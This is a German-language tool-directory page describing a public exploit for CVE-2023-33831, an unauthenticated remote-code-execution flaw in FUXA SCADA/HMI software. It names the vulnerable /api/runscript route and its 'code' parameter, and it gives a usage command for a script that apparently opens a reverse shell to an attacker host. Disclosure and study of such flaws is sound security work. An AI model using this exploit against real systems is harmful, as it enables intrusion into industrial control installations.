Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Unauthenticated-RCE-FUXA-CVE-2023-33831 — Beschreibung und Exploit von CVE-2023-33831, der die webbasierte Prozessvisualisierungssoftware FUXA (SCADA/HMI/Dashboard) betrifft. | Kitploit
Tools/GitHubGitHub/rodolfomarianocy/unauthenticated-rce-fuxa-cve-2023-33831
Payload-GenerierungSchwachstellenanalyseExploitationSCADA/ICS-SicherheitWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubrodolfomarianocy/unauthenticated-rce-fuxa-cve-2023-33831

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Unauthenticated-RCE-FUXA-CVE-2023-33831

Beschreibung und Exploit von CVE-2023-33831, der die webbasierte Prozessvisualisierungssoftware FUXA (SCADA/HMI/Dashboard) betrifft.

Repository anzeigen
132vor 1 JahrNoch nicht geprüft

Nicht authentifiziertes RCE FUXA CVE-2023-33831

Die Sicherheitslücke betrifft die Scripting-Komponente von FUXA, da Eingaben, die von Benutzern kontrolliert werden können, nicht ausreichend kontrolliert oder bereinigt werden, wodurch die Verwendung gefährlicher Methoden ermöglicht wird, die für die Remote-Code-Ausführung ausgenutzt werden können. Die betroffene Route ist /api/runscript, wo es möglich ist, Befehle auszuführen, ohne sich authentifizieren zu müssen, über den code-Parameter mittels der POST-Methode unter Verwendung des child_process-Moduls über die exec-Funktion.


Verwendungsweise

root@kitploit:~
python CVE-2023-33831.py --rhost <ip> --rport <rport> --lhost <lhost> --lport <lport>

Link: https://www.youtube.com/watch?v=Xxa6yRB2Fpw

Tool herunterladen